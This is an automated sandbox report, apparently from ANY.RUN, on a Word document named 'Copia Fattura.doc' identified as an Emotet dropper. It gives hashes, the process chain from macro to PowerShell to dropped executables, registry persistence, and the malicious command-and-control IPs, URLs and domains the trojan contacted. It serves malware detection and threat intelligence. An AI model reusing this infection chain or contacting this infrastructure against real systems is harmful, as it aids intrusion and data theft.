File name: Copia Fattura.doc

Full analysis: https://app.any.run/tasks/e562a722-fa88-466f-b0cc-4d7e423c4ea3
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 08:27:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, emotet-doc, emotet, generated-doc, trojan, evasion
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Triple-buffered New Hampshire, Subject: Ergonomic Wooden Car, Author: Rosina Rowe, Comments: Fall tan, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 07:46:00 2019, Last Saved Time/Date: Thu Sep 19 07:46:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: 2D46AA86A46A424F66E8A72FF975BBDF
SHA1: BCCEE59D492C1A5EEEA7BC54B3F2EB03BFEFE2EE
SHA256: 47C0ADBB3E78AA5317BA38CA2DCA6182C468CECD3BC868CFCDC24D3F5434D1CA
SSDEEP: 6144:zXSY2WaPaQxUk+MclQDgQOaPLkI27NSU4jJntATfDeTPsOupth:zCY2WaPaQxUk+MclQDgQO4X27NSU4VeF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 572.exe (PID: 3764)
      • 572.exe (PID: 3056)
      • 572.exe (PID: 3964)
      • easywindow.exe (PID: 2860)
      • easywindow.exe (PID: 3900)
      • 572.exe (PID: 3168)
      • easywindow.exe (PID: 2904)
      • easywindow.exe (PID: 3728)
    • Emotet process was detected

      • 572.exe (PID: 3964)
    • EMOTET was detected

      • easywindow.exe (PID: 3728)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 3728)
    • Connects to CnC server

      • easywindow.exe (PID: 3728)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2520)
    • Executed via WMI

      • powershell.exe (PID: 2520)
    • Creates files in the user directory

      • powershell.exe (PID: 2520)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2520)
      • 572.exe (PID: 3964)
    • Starts itself from another location

      • 572.exe (PID: 3964)
    • Application launched itself

      • easywindow.exe (PID: 2904)
    • Connects to server without host name

      • easywindow.exe (PID: 3728)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3632)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2520)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3632)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Greenholt
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 641
Paragraphs: 1
Lines: 4
Company: Raynor LLC
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 547
Words: 95
Pages: 1
ModifyDate: 2019:09:19 06:46:00
CreateDate: 2019:09:19 06:46:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Fall tan
Keywords: -
Author: Rosina Rowe
Subject: Ergonomic Wooden Car
Title: Triple-buffered New Hampshire
No data.
Total processes: 44
Monitored processes: 10
Malicious processes: 8
Suspicious processes: 1

Behavior graph

Process chain as shown in the graph (the two "drop and start" edges correspond to the "Executable content was dropped or overwritten" indicators for powershell.exe and 572.exe above):

start → winword.exe (no specs) → powershell.exe → drop and start → 572.exe (no specs) → 572.exe (no specs) → 572.exe (no specs) → #EMOTET 572.exe → drop and start → easywindow.exe (no specs) → easywindow.exe (no specs) → easywindow.exe (no specs) → #EMOTET easywindow.exe

Process information

PID | CMD | Path | Parent process

3632 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Copia Fattura.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

2520 | powershell -encod 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

3764 | "C:\Users\admin\572.exe" | C:\Users\admin\572.exe | powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

3056 | "C:\Users\admin\572.exe" | C:\Users\admin\572.exe | 572.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

3168 | --fb4ffeee | C:\Users\admin\572.exe | 572.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

3964 | --fb4ffeee | C:\Users\admin\572.exe | 572.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

3900 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | 572.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

2860 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

2904 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

3728 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: - (still running at the end of the analysis)
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 1 780
Read events: 1 286
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 2
Suspicious files: 10
Text files: 0
Unknown types: 43

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9A8F.tmp.cvr | - | - | -
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BAA26137.wmf | wmf | 0503FA9073CC728BA4C85E51DE992937 | 50BE34B8D632A4C817D1BCEDD1E628BCEC1CA1B725C1340C3830C6D99A37C8A0
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59918165.wmf | wmf | B70BB9F6F44D7896781A5E123A5BCE6B | 6F946E3E104D36BDC4C6BAC5C6E5E7FD61933A42B104348FCB83EF74FB377446
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C543575D.wmf | wmf | 204D836FD505DB3AFD1A1C49AF2BFDC0 | CDC20E663AEBB947ACE1B0C0CB8C116D0AF2B77755127CF3B5043F42E43D741A
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ECBFB7FF.wmf | wmf | 0E8445374B10B1E7BDCA33CEF020D4EF | B4D249824F7D8C5D11AC43ACEEFC6E91AF7EA5C327ED4935585FC45E36B06A47
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6AC9009.wmf | wmf | BF2AE3979B516EC40C5293EFF0C09851 | DC00D85E30FA97E02F4285E3F6AE2BD51120E48C7F2B32DB51C11008E299729A
3632 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | CD0929FDC6545C244CB285B22558DE27 | 4F0C83A3FE87834B4FE11EE04E1367F736F25C3034A92327199430EDC9366CAD
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CCC01DBB.wmf | wmf | 48B036286BEF39F73081E1128B7E4DF3 | DD947EE606C34891E9ED4BD281F6A47D84295F4147E5B6FF32A04FC4BD6716B3
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | DACA5A5ABD9803CFB09FA44C7B26CCC1 | 31CBDCCAFBD9719E5302070CAE16D8320251B21AF3D537A15B963505A1AF3F42
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83843A81.wmf | wmf | 5636F5A95FE29BEE903669E7F9CE9A3F | 10489CCEFDE7121CB01CDB0AA804BA1A5DA04DBB1B95EE0E9586C5105D92913C
HTTP(S) requests: 8
TCP/UDP connections: 170
DNS requests: 147
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3728 | easywindow.exe | POST | - | 190.18.146.70:80 | http://190.18.146.70/pdf/ | AR | - | - | malicious
3728 | easywindow.exe | POST | 200 | 187.147.50.167:8080 | http://187.147.50.167:8080/badge/ | MX | binary | 148 b | malicious
3728 | easywindow.exe | GET | 200 | 69.43.168.232:443 | http://69.43.168.232:443/whoami.php | US | text | 12 b | malicious
3728 | easywindow.exe | POST | 200 | 69.43.168.232:443 | http://69.43.168.232:443/arizona/ban/ | US | binary | 1.53 Mb | malicious
3728 | easywindow.exe | POST | 200 | 69.43.168.232:443 | http://69.43.168.232:443/ban/enable/ringin/merge/ | US | binary | 178 Kb | malicious
3728 | easywindow.exe | POST | 200 | 187.147.50.167:8080 | http://187.147.50.167:8080/loadan/attrib/ | MX | binary | 1.38 Mb | malicious
3728 | easywindow.exe | GET | 200 | 69.43.168.232:443 | http://69.43.168.232:443/whoami.php | US | text | 12 b | malicious
3728 | easywindow.exe | POST | 200 | 69.43.168.232:443 | http://69.43.168.232:443/json/enable/ringin/merge/ | US | binary | 3.39 Mb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3728 | easywindow.exe | 190.18.146.70:80 | - | CABLEVISION S.A. | AR | malicious
3728 | easywindow.exe | 72.12.114.84:110 | mail.198da.com | Hill Country Telephone Cooperative, Inc. | US | unknown
3728 | easywindow.exe | 187.147.50.167:8080 | - | Uninet S.A. de C.V. | MX | malicious
2520 | powershell.exe | 104.28.18.13:443 | aniventure.co.uk | Cloudflare Inc | US | shared
3728 | easywindow.exe | 81.169.145.131:587 | pop3.strato.de | Strato AG | DE | unknown
3728 | easywindow.exe | 69.43.168.232:443 | - | Castle Access Inc | US | malicious
3728 | easywindow.exe | 89.248.110.185:110 | mail.motorgomez.com | Cloud Builders SA | ES | unknown
3728 | easywindow.exe | 76.12.236.183:110 | win-mail18.hostmanagement.net | HostMySite | US | unknown
3728 | easywindow.exe | 173.201.193.97:995 | pop.secureserver.net | GoDaddy.com, LLC | US | unknown
3728 | easywindow.exe | 213.33.98.149:995 | securemail.a1.net | A1 Telekom Austria AG | AT | unknown

DNS requests

Domain | IP | Reputation
aniventure.co.uk | 104.28.18.13, 104.28.19.13 | malicious
pop.secureserver.net | 173.201.193.97, 68.178.252.117, 173.201.192.158, 173.201.192.129, 97.74.135.10, 72.167.218.138, 173.201.193.129, 97.74.135.143 | shared
pop3.strato.de | 81.169.145.131 | unknown
pp.oatalcm | - | unknown
mail.crezenta.com | 86.109.162.144 | unknown
bces.o | - | unknown
mail.198da.com | 72.12.114.84 | unknown
mail.casintra.com | 217.76.128.68 | unknown
ia.oo.ou | - | unknown
mail.motorgomez.com | 89.248.110.185 | unknown

Threats

PID | Process | Class | Message
3728 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3728 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3728 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3728 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3728 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3728 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
3728 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3728 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
- | - | A Network Trojan was detected | AV INFO Observed DNS Query to Suspicious Domain *[.]o
3728 | easywindow.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction
11 ETPRO signatures available at the full report
No debug info